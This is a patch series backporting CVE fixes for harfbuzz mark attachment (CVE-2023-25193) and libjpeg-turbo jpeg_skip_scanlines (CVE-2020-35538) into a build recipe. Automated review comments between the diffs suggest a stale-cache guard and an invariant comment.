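+Subject: [PATCH] [GPOS] Avoid O(n^2) behavior in mark-attachment
+
+Upstream-Status: Backport from [https://github.com/harfbuzz/harfbuzz/commit/8708b9e081192786c027bb7f5f23d76dbe5c19e8]
+Comment1: The Original Patch [https://github.com/harfbuzz/harfbuzz/commit/85be877925ddbf34f74a1229f3ca1716bb6170dc] causes regression and was reverted. This Patch completes the fix.
+Comment2: The Patch contained files MarkBasePosFormat1.hh and MarkLigPosFormat1.hh which were moved from hb-ot-layout-gpos-table.hh as per https://github.com/harfbuzz/harfbuzz/commit/197d9a5c994eb41c8c89b7b958b26b1eacfeeb00
+CVE: CVE-2023-25193
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
+
+---
+ src/hb-ot-layout-gpos-table.hh | 103 +++++++++++++++++++++++----------
+ src/hb-ot-layout-gsubgpos.hh | 5 +-
+ 2 files changed, 78 insertions(+), 30 deletions(-)
+
+diff --git a/src/hb-ot-layout-gpos-table.hh b/src/hb-ot-layout-gpos-table.hh
+index 024312d..db5f9ae 100644
+--- a/src/hb-ot-layout-gpos-table.hh
++++ b/src/hb-ot-layout-gpos-table.hh
+@@ -1458,6 +1458,25 @@ struct MarkBasePosFormat1
+
+ const Coverage &get_coverage () const { return this+markCoverage; }
+
++ static inline bool accept (hb_buffer_t *buffer, unsigned idx)
++ {
++ /* We only want to attach to the first of a MultipleSubst sequence.
++ * https://github.com/harfbuzz/harfbuzz/issues/740
++ * Reject others...
++ * ...but stop if we find a mark in the MultipleSubst sequence:
++ * https://github.com/harfbuzz/harfbuzz/issues/1020 */
++ return !_hb_glyph_info_multiplied (&buffer->info[idx]) ||
++ 0 == _hb_glyph_info_get_lig_comp (&buffer->info[idx]) ||
++ (idx == 0 ||
++ _hb_glyph_info_is_mark (&buffer->info[idx - 1]) ||
++ !_hb_glyph_info_multiplied (&buffer->info[idx - 1]) ||
++ _hb_glyph_info_get_lig_id (&buffer->info[idx]) !=
++ _hb_glyph_info_get_lig_id (&buffer->info[idx - 1]) ||
++ _hb_glyph_info_get_lig_comp (&buffer->info[idx]) !=
++ _hb_glyph_info_get_lig_comp (&buffer->info[idx - 1]) + 1
++ );
++ }
++
+ bool apply (hb_ot_apply_context_t *c) const
+ {
+ TRACE_APPLY (this);
+@@ -1465,37 +1484,46 @@ struct MarkBasePosFormat1
+ unsigned int mark_index = (this+markCoverage).get_coverage (buffer->cur().codepoint);
+ if (likely (mark_index == NOT_COVERED)) return_trace (false);
+
+- /* Now we search backwards for a non-mark glyph */
++ /* Now we search backwards for a non-mark glyph.
++ * We don't use skippy_iter.prev() to avoid O(n^2) behavior. */
++
+ hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
+- skippy_iter.reset (buffer->idx, 1);
+ skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
+- do {
+- if (!skippy_iter.prev ()) return_trace (false);
+- /* We only want to attach to the first of a MultipleSubst sequence.
+- * https://github.com/harfbuzz/harfbuzz/issues/740
+- * Reject others...
+- * ...but stop if we find a mark in the MultipleSubst sequence:
+- * https://github.com/harfbuzz/harfbuzz/issues/1020 */
+- if (!_hb_glyph_info_multiplied (&buffer->info[skippy_iter.idx]) ||
+- 0 == _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) ||
+- (skippy_iter.idx == 0 ||
+- _hb_glyph_info_is_mark (&buffer->info[skippy_iter.idx - 1]) ||
+- _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx]) !=
+- _hb_glyph_info_get_lig_id (&buffer->info[skippy_iter.idx - 1]) ||
+- _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx]) !=
+- _hb_glyph_info_get_lig_comp (&buffer->info[skippy_iter.idx - 1]) + 1
+- ))
+- break;
+- skippy_iter.reject ();
+- } while (true);
++ unsigned j;
++ for (j = buffer->idx; j > c->last_base_until; j--)
++ {
++ auto match = skippy_iter.match (buffer->info[j - 1]);
++ if (match == skippy_iter.MATCH)
++ {
++ if (!accept (buffer, j - 1))
++ match = skippy_iter.SKIP;
++ }
++ if (match == skippy_iter.MATCH)
++ {
++ c->last_base = (signed) j - 1;
++ break;
++ }
++ }
++ c->last_base_until = buffer->idx;
++ if (c->last_base == -1)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
++ return_trace (false);
++ }
++
++ unsigned idx = (unsigned) c->last_base;
+
+ /* Checking that matched glyph is actually a base glyph by GDEF is too strong; disabled */
+- //if (!_hb_glyph_info_is_base_glyph (&buffer->info[skippy_iter.idx])) { return_trace (false); }
++ //if (!_hb_glyph_info_is_base_glyph (&buffer->info[idx])) { return_trace (false); }
+
+- unsigned int base_index = (this+baseCoverage).get_coverage (buffer->info[skippy_iter.idx].codepoint);
+- if (base_index == NOT_COVERED) return_trace (false);
++ unsigned int base_index = (this+baseCoverage).get_coverage (buffer->info[idx].codepoint);
++ if (base_index == NOT_COVERED)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (idx, buffer->idx + 1);
++ return_trace (false);
++ }
+
+- return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, skippy_iter.idx));
++ return_trace ((this+markArray).apply (c, mark_index, base_index, this+baseArray, classCount, idx));
+ }
+
+ bool subset (hb_subset_context_t *c) const
+@@ -1587,15 +1615,32 @@ struct MarkLigPosFormat1
+ if (likely (mark_index == NOT_COVERED)) return_trace (false);
+
+ /* Now we search backwards for a non-mark glyph */
++
+ hb_ot_apply_context_t::skipping_iterator_t &skippy_iter = c->iter_input;
+- skippy_iter.reset (buffer->idx, 1);
+ skippy_iter.set_lookup_props (LookupFlag::IgnoreMarks);
+- if (!skippy_iter.prev ()) return_trace (false);
++
++ unsigned j;
++ for (j = buffer->idx; j > c->last_base_until; j--)
++ {
++ auto match = skippy_iter.match (buffer->info[j - 1]);
++ if (match == skippy_iter.MATCH)
++ {
++ c->last_base = (signed) j - 1;
++ break;
++ }
++ }
++ c->last_base_until = buffer->idx;
++ if (c->last_base == -1)
++ {
++ buffer->unsafe_to_concat_from_outbuffer (0, buffer->idx + 1);
++ return_trace (false);
++ }
++
++ j = (unsigned) c->last_base;
+
+ /* Checking that matched glyph is actually a ligature by GDEF is too strong; disabled */
+- //if (!_hb_glyph_info_is_ligature (&buffer->info[skippy_iter.idx])) { return_trace (false); }
++ //if (!_hb_glyph_info_is_ligature (&buffer->info[idx])) { return_trace (false); }
+
+- unsigned int j = skippy_iter.idx;
+ unsigned int lig_index = (this+ligatureCoverage).get_coverage (buffer->info[j].codepoint);
+ if (lig_index == NOT_COVERED) return_trace (false);
+
+diff --git a/src/hb-ot-layout-gsubgpos.hh b/src/hb-ot-layout-gsubgpos.hh
+index 5a7e564..437123c 100644
+--- a/src/hb-ot-layout-gsubgpos.hh
++++ b/src/hb-ot-layout-gsubgpos.hh
+@@ -503,6 +503,9 @@ struct hb_ot_apply_context_t :
+ uint32_t random_state;
+
+
++ signed last_base = -1; // GPOS uses
++ unsigned last_base_until = 0; // GPOS uses
++
+ hb_ot_apply_context_t (unsigned int table_index_,
+ hb_font_t *font_,
+ hb_buffer_t *buffer_) :
+@@ -536,7 +539,7 @@ struct hb_ot_apply_context_t :
+ iter_context.init (this, true);
+ }
+
+- void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; init_iters (); }
++ void set_lookup_mask (hb_mask_t mask) { lookup_mask = mask; last_base = -1; last_base_until = 0; init_iters (); }
+ void set_auto_zwj (bool auto_zwj_) { auto_zwj = auto_zwj_; init_iters (); }
+ void set_auto_zwnj (bool auto_zwnj_) { auto_zwnj = auto_zwnj_; init_iters (); }
+ void set_random (bool random_) { random = random_; }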
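Review bot: The cached base in `MarkBasePosFormat1::apply` and `MarkLigPosFormat1::apply` is reused without checking that it still lies before the current mark: when `buffer->idx` is not greater than `c->last_base_until`, the loop `for (j = buffer->idx; j > c->last_base_until; j--)` does not run and `c->last_base` from an earlier call is used as is. The only reset visible here is in `set_lookup_mask`, so if `apply` can be re-entered at a smaller `buffer->idx` under the same mask (not visible in these hunks), the mark could be positioned against a glyph at or after it. A guard ahead of the loop in both functions would discard a stale cache while keeping the linear bound this fix is after: `if (c->last_base_until > buffer->idx) { c->last_base_until = 0; c->last_base = -1; }`. The `MarkLigPosFormat1::apply` body starts and ends outside its hunk, so the rest of that function should be checked for other uses of `j`.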
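--- a/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
+++ b/meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb
@@ -7,7 +7,10 @@ LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://COPYING;md5=e11f5c3149cdec4bb309babb020b32b9 \
  file://src/hb-ucd.cc;beginline=1;endline=15;md5=29d4dcb6410429195df67efe3382d8bc"
 
-SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz"
+SRC_URI = "http://www.freedesktop.org/software/harfbuzz/release/${BP}.tar.xz \
+ file://CVE-2023-25193-pre0.patch \
+ file://CVE-2023-25193-pre1.patch \
+ file://CVE-2023-25193.patch"
 SRC_URI[md5sum] = "2b3a4dfdb3e5e50055f941978944da9f"
 SRC_URI[sha256sum] = "9413b8d96132d699687ef914ebb8c50440efc87b3f775d25856d7ec347c03c12"
 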
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
new file mode 100644
index 0000000000..8a52ed01e9
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch
@@ -0,0 +1,457 @@
1From 9120a247436e84c0b4eea828cb11e8f665fcde30 Mon Sep 17 00:00:00 2001
2From: DRC <information@libjpeg-turbo.org>
3Date: Thu, 23 Jul 2020 21:24:38 -0500
4Subject: [PATCH] Fix jpeg_skip_scanlines() segfault w/merged upsamp
5
6The additional segfault mentioned in #244 was due to the fact that
7the merged upsamplers use a different private structure than the
8non-merged upsamplers. jpeg_skip_scanlines() was assuming the latter, so
9when merged upsampling was enabled, jpeg_skip_scanlines() clobbered one
10of the IDCT method pointers in the merged upsampler's private structure.
11
12For reasons unknown, the test image in #441 did not encounter this
13segfault (too small?), but it encountered an issue similar to the one
14fixed in 5bc43c7821df982f65aa1c738f67fbf7cba8bd69, whereby it was
15necessary to set up a dummy postprocessing function in
16read_and_discard_scanlines() when merged upsampling was enabled.
17Failing to do so caused either a segfault in merged_2v_upsample() (due
18to a NULL pointer being passed to jcopy_sample_rows()) or an error
19("Corrupt JPEG data: premature end of data segment"), depending on the
20number of scanlines skipped and whether the first scanline skipped was
21an odd- or even-numbered row.
22
23Fixes #441
24Fixes #244 (for real this time)
25
26Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9120a247436e84c0b4eea828cb11e8f665fcde30]
27CVE: CVE-2020-35538
28Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
29---
30 ChangeLog.md | 7 +++++
31 jdapistd.c | 72 ++++++++++++++++++++++++++++++++++++++++++++++------
32 jdmerge.c | 46 +++++++--------------------------
33 jdmerge.h | 47 ++++++++++++++++++++++++++++++++++
34 jdmrg565.c | 10 ++++----
35 jdmrgext.c | 6 ++---
36 6 files changed, 135 insertions(+), 53 deletions(-)
37 create mode 100644 jdmerge.h
38
39diff --git a/ChangeLog.md b/ChangeLog.md
40index 2ebfe71..19d18fa 100644
41--- a/ChangeLog.md
42+++ b/ChangeLog.md
43@@ -54,6 +54,13 @@ a 16-bit binary PGM file into an RGB image buffer.
44 generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
45 file into an extended RGB image buffer.
46
47+2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
48+in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
49+images using the merged (non-fancy) upsampling algorithms (that is, when
50+setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a similar fix,
51+but it did not cover all cases.
52+
53+
54 2.0.3
55 =====
56
57diff --git a/jdapistd.c b/jdapistd.c
58index 2c808fa..91da642 100644
59--- a/jdapistd.c
60+++ b/jdapistd.c
61@@ -4,7 +4,7 @@
62 * This file was part of the Independent JPEG Group's software:
63 * Copyright (C) 1994-1996, Thomas G. Lane.
64 * libjpeg-turbo Modifications:
65- * Copyright (C) 2010, 2015-2018, D. R. Commander.
66+ * Copyright (C) 2010, 2015-2018, 2020, D. R. Commander.
67 * Copyright (C) 2015, Google, Inc.
68 * For conditions of distribution and use, see the accompanying README.ijg
69 * file.
70@@ -21,6 +21,8 @@
71 #include "jinclude.h"
72 #include "jdmainct.h"
73 #include "jdcoefct.h"
74+#include "jdmaster.h"
75+#include "jdmerge.h"
76 #include "jdsample.h"
77 #include "jmemsys.h"
78
79@@ -304,6 +306,16 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
80 }
81
82
83+/* Dummy postprocessing function used by jpeg_skip_scanlines() */
84+LOCAL(void)
85+noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
86+ JDIMENSION *in_row_group_ctr,
87+ JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
88+ JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
89+{
90+}
91+
92+
93 /*
94 * In some cases, it is best to call jpeg_read_scanlines() and discard the
95 * output, rather than skipping the scanlines, because this allows us to
96@@ -316,11 +328,17 @@ LOCAL(void)
97 read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
98 {
99 JDIMENSION n;
100+ my_master_ptr master = (my_master_ptr)cinfo->master;
101 void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
102 JDIMENSION input_row, JSAMPARRAY output_buf,
103 int num_rows) = NULL;
104 void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
105 JSAMPARRAY output_buf, int num_rows) = NULL;
106+ void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
107+ JDIMENSION *in_row_group_ctr,
108+ JDIMENSION in_row_groups_avail,
109+ JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
110+ JDIMENSION out_rows_avail) = NULL;
111
112 if (cinfo->cconvert && cinfo->cconvert->color_convert) {
113 color_convert = cinfo->cconvert->color_convert;
114@@ -332,6 +350,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
115 cinfo->cquantize->color_quantize = noop_quantize;
116 }
117
118+ if (master->using_merged_upsample && cinfo->post &&
119+ cinfo->post->post_process_data) {
120+ post_process_data = cinfo->post->post_process_data;
121+ cinfo->post->post_process_data = noop_post_process;
122+ }
123+
124 for (n = 0; n < num_lines; n++)
125 jpeg_read_scanlines(cinfo, NULL, 1);
126
127@@ -340,6 +364,9 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
128
129 if (color_quantize)
130 cinfo->cquantize->color_quantize = color_quantize;
131+
132+ if (post_process_data)
133+ cinfo->post->post_process_data = post_process_data;
134 }
135
136
137@@ -382,7 +409,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
138 {
139 my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
140 my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
141- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
142+ my_master_ptr master = (my_master_ptr)cinfo->master;
143 JDIMENSION i, x;
144 int y;
145 JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
146@@ -445,8 +472,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
147 main_ptr->buffer_full = FALSE;
148 main_ptr->rowgroup_ctr = 0;
149 main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
150- upsample->next_row_out = cinfo->max_v_samp_factor;
151- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
152+ if (master->using_merged_upsample) {
153+ my_merged_upsample_ptr upsample =
154+ (my_merged_upsample_ptr)cinfo->upsample;
155+ upsample->spare_full = FALSE;
156+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
157+ } else {
158+ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
159+ upsample->next_row_out = cinfo->max_v_samp_factor;
160+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
161+ }
162 }
163
164 /* Skipping is much simpler when context rows are not required. */
165@@ -458,8 +493,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
166 cinfo->output_scanline += lines_left_in_iMCU_row;
167 main_ptr->buffer_full = FALSE;
168 main_ptr->rowgroup_ctr = 0;
169- upsample->next_row_out = cinfo->max_v_samp_factor;
170- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
171+ if (master->using_merged_upsample) {
172+ my_merged_upsample_ptr upsample =
173+ (my_merged_upsample_ptr)cinfo->upsample;
174+ upsample->spare_full = FALSE;
175+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
176+ } else {
177+ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
178+ upsample->next_row_out = cinfo->max_v_samp_factor;
179+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
180+ }
181 }
182 }
183
184@@ -494,7 +537,14 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
185 cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
186 increment_simple_rowgroup_ctr(cinfo, lines_to_read);
187 }
188- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
189+ if (master->using_merged_upsample) {
190+ my_merged_upsample_ptr upsample =
191+ (my_merged_upsample_ptr)cinfo->upsample;
192+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
193+ } else {
194+ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
195+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
196+ }
197 return num_lines;
198 }
199
200@@ -535,7 +585,13 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
201 * bit odd, since "rows_to_go" seems to be redundantly keeping track of
202 * output_scanline.
203 */
204- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
205+ if (master->using_merged_upsample) {
206+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
207+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
208+ } else {
209+ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
210+ upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
211+ }
212
213 /* Always skip the requested number of lines. */
214 return num_lines;
215diff --git a/jdmerge.c b/jdmerge.c
216index dff5a35..833ad67 100644
217--- a/jdmerge.c
218+++ b/jdmerge.c
219@@ -5,7 +5,7 @@
220 * Copyright (C) 1994-1996, Thomas G. Lane.
221 * libjpeg-turbo Modifications:
222 * Copyright 2009 Pierre Ossman <ossman@cendio.se> for Cendio AB
223- * Copyright (C) 2009, 2011, 2014-2015, D. R. Commander.
224+ * Copyright (C) 2009, 2011, 2014-2015, 2020, D. R. Commander.
225 * Copyright (C) 2013, Linaro Limited.
226 * For conditions of distribution and use, see the accompanying README.ijg
227 * file.
228@@ -40,41 +40,13 @@
229 #define JPEG_INTERNALS
230 #include "jinclude.h"
231 #include "jpeglib.h"
232+#include "jdmerge.h"
233 #include "jsimd.h"
234 #include "jconfigint.h"
235
236 #ifdef UPSAMPLE_MERGING_SUPPORTED
237
238
239-/* Private subobject */
240-
241-typedef struct {
242- struct jpeg_upsampler pub; /* public fields */
243-
244- /* Pointer to routine to do actual upsampling/conversion of one row group */
245- void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
246- JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
247-
248- /* Private state for YCC->RGB conversion */
249- int *Cr_r_tab; /* => table for Cr to R conversion */
250- int *Cb_b_tab; /* => table for Cb to B conversion */
251- JLONG *Cr_g_tab; /* => table for Cr to G conversion */
252- JLONG *Cb_g_tab; /* => table for Cb to G conversion */
253-
254- /* For 2:1 vertical sampling, we produce two output rows at a time.
255- * We need a "spare" row buffer to hold the second output row if the
256- * application provides just a one-row buffer; we also use the spare
257- * to discard the dummy last row if the image height is odd.
258- */
259- JSAMPROW spare_row;
260- boolean spare_full; /* T if spare buffer is occupied */
261-
262- JDIMENSION out_row_width; /* samples per output row */
263- JDIMENSION rows_to_go; /* counts rows remaining in image */
264-} my_upsampler;
265-
266-typedef my_upsampler *my_upsample_ptr;
267-
268 #define SCALEBITS 16 /* speediest right-shift on some machines */
269 #define ONE_HALF ((JLONG)1 << (SCALEBITS - 1))
270 #define FIX(x) ((JLONG)((x) * (1L << SCALEBITS) + 0.5))
271@@ -189,7 +161,7 @@ typedef my_upsampler *my_upsample_ptr;
272 LOCAL(void)
273 build_ycc_rgb_table(j_decompress_ptr cinfo)
274 {
275- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
276+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
277 int i;
278 JLONG x;
279 SHIFT_TEMPS
280@@ -232,7 +204,7 @@ build_ycc_rgb_table(j_decompress_ptr cinfo)
281 METHODDEF(void)
282 start_pass_merged_upsample(j_decompress_ptr cinfo)
283 {
284- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
285+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
286
287 /* Mark the spare buffer empty */
288 upsample->spare_full = FALSE;
289@@ -254,7 +226,7 @@ merged_2v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
290 JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
291 /* 2:1 vertical sampling case: may need a spare row. */
292 {
293- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
294+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
295 JSAMPROW work_ptrs[2];
296 JDIMENSION num_rows; /* number of rows returned to caller */
297
298@@ -305,7 +277,7 @@ merged_1v_upsample(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
299 JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
300 /* 1:1 vertical sampling case: much easier, never need a spare row. */
301 {
302- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
303+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
304
305 /* Just do the upsampling. */
306 (*upsample->upmethod) (cinfo, input_buf, *in_row_group_ctr,
307@@ -566,11 +538,11 @@ h2v2_merged_upsample_565D(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
308 GLOBAL(void)
309 jinit_merged_upsampler(j_decompress_ptr cinfo)
310 {
311- my_upsample_ptr upsample;
312+ my_merged_upsample_ptr upsample;
313
314- upsample = (my_upsample_ptr)
315+ upsample = (my_merged_upsample_ptr)
316 (*cinfo->mem->alloc_small) ((j_common_ptr)cinfo, JPOOL_IMAGE,
317- sizeof(my_upsampler));
318+ sizeof(my_merged_upsampler));
319 cinfo->upsample = (struct jpeg_upsampler *)upsample;
320 upsample->pub.start_pass = start_pass_merged_upsample;
321 upsample->pub.need_context_rows = FALSE;
322diff --git a/jdmerge.h b/jdmerge.h
323new file mode 100644
324index 0000000..b583396
325--- /dev/null
326+++ b/jdmerge.h
327@@ -0,0 +1,47 @@
328+/*
329+ * jdmerge.h
330+ *
331+ * This file was part of the Independent JPEG Group's software:
332+ * Copyright (C) 1994-1996, Thomas G. Lane.
333+ * libjpeg-turbo Modifications:
334+ * Copyright (C) 2020, D. R. Commander.
335+ * For conditions of distribution and use, see the accompanying README.ijg
336+ * file.
337+ */
338+
339+#define JPEG_INTERNALS
340+#include "jpeglib.h"
341+
342+#ifdef UPSAMPLE_MERGING_SUPPORTED
343+
344+
345+/* Private subobject */
346+
347+typedef struct {
348+ struct jpeg_upsampler pub; /* public fields */
349+
350+ /* Pointer to routine to do actual upsampling/conversion of one row group */
351+ void (*upmethod) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
352+ JDIMENSION in_row_group_ctr, JSAMPARRAY output_buf);
353+
354+ /* Private state for YCC->RGB conversion */
355+ int *Cr_r_tab; /* => table for Cr to R conversion */
356+ int *Cb_b_tab; /* => table for Cb to B conversion */
357+ JLONG *Cr_g_tab; /* => table for Cr to G conversion */
358+ JLONG *Cb_g_tab; /* => table for Cb to G conversion */
359+
360+ /* For 2:1 vertical sampling, we produce two output rows at a time.
361+ * We need a "spare" row buffer to hold the second output row if the
362+ * application provides just a one-row buffer; we also use the spare
363+ * to discard the dummy last row if the image height is odd.
364+ */
365+ JSAMPROW spare_row;
366+ boolean spare_full; /* T if spare buffer is occupied */
367+
368+ JDIMENSION out_row_width; /* samples per output row */
369+ JDIMENSION rows_to_go; /* counts rows remaining in image */
370+} my_merged_upsampler;
371+
372+typedef my_merged_upsampler *my_merged_upsample_ptr;
373+
374+#endif /* UPSAMPLE_MERGING_SUPPORTED */
375diff --git a/jdmrg565.c b/jdmrg565.c
376index 1b87e37..53f1e16 100644
377--- a/jdmrg565.c
378+++ b/jdmrg565.c
379@@ -5,7 +5,7 @@
380 * Copyright (C) 1994-1996, Thomas G. Lane.
381 * libjpeg-turbo Modifications:
382 * Copyright (C) 2013, Linaro Limited.
383- * Copyright (C) 2014-2015, 2018, D. R. Commander.
384+ * Copyright (C) 2014-2015, 2018, 2020, D. R. Commander.
385 * For conditions of distribution and use, see the accompanying README.ijg
386 * file.
387 *
388@@ -19,7 +19,7 @@ h2v1_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
389 JDIMENSION in_row_group_ctr,
390 JSAMPARRAY output_buf)
391 {
392- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
393+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
394 register int y, cred, cgreen, cblue;
395 int cb, cr;
396 register JSAMPROW outptr;
397@@ -90,7 +90,7 @@ h2v1_merged_upsample_565D_internal(j_decompress_ptr cinfo,
398 JDIMENSION in_row_group_ctr,
399 JSAMPARRAY output_buf)
400 {
401- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
402+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
403 register int y, cred, cgreen, cblue;
404 int cb, cr;
405 register JSAMPROW outptr;
406@@ -163,7 +163,7 @@ h2v2_merged_upsample_565_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
407 JDIMENSION in_row_group_ctr,
408 JSAMPARRAY output_buf)
409 {
410- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
411+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
412 register int y, cred, cgreen, cblue;
413 int cb, cr;
414 register JSAMPROW outptr0, outptr1;
415@@ -259,7 +259,7 @@ h2v2_merged_upsample_565D_internal(j_decompress_ptr cinfo,
416 JDIMENSION in_row_group_ctr,
417 JSAMPARRAY output_buf)
418 {
419- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
420+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
421 register int y, cred, cgreen, cblue;
422 int cb, cr;
423 register JSAMPROW outptr0, outptr1;
424diff --git a/jdmrgext.c b/jdmrgext.c
425index b1c27df..c9a44d8 100644
426--- a/jdmrgext.c
427+++ b/jdmrgext.c
428@@ -4,7 +4,7 @@
429 * This file was part of the Independent JPEG Group's software:
430 * Copyright (C) 1994-1996, Thomas G. Lane.
431 * libjpeg-turbo Modifications:
432- * Copyright (C) 2011, 2015, D. R. Commander.
433+ * Copyright (C) 2011, 2015, 2020, D. R. Commander.
434 * For conditions of distribution and use, see the accompanying README.ijg
435 * file.
436 *
437@@ -25,7 +25,7 @@ h2v1_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
438 JDIMENSION in_row_group_ctr,
439 JSAMPARRAY output_buf)
440 {
441- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
442+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
443 register int y, cred, cgreen, cblue;
444 int cb, cr;
445 register JSAMPROW outptr;
446@@ -97,7 +97,7 @@ h2v2_merged_upsample_internal(j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
447 JDIMENSION in_row_group_ctr,
448 JSAMPARRAY output_buf)
449 {
450- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
451+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
452 register int y, cred, cgreen, cblue;
453 int cb, cr;
454 register JSAMPROW outptr0, outptr1;
455--
4562.25.1
457
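Review bot: The casts of `cinfo->upsample` in jpeg_skip_scanlines() are now selected by `master->using_merged_upsample` in four separate places, but nothing in the added jdmerge.h records that this flag decides which private struct the pointer refers to. The patch description attributes the crash to jpeg_skip_scanlines() assuming the non-merged layout while the merged upsampler was in use, so the invariant deserves a comment where the type is declared, for example above `my_merged_upsampler`: `/* cinfo->upsample has this layout only when master->using_merged_upsample is set; never cast it to my_upsample_ptr in that case. */`. The code that sets the flag is not part of this patch, so the wording should be confirmed against it. The four near-identical if/else blocks could also be folded into one static helper, though keeping the backport identical to upstream is a reasonable argument against that.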
diff --git a/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
new file mode 100644
index 0000000000..f86175dff0
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch
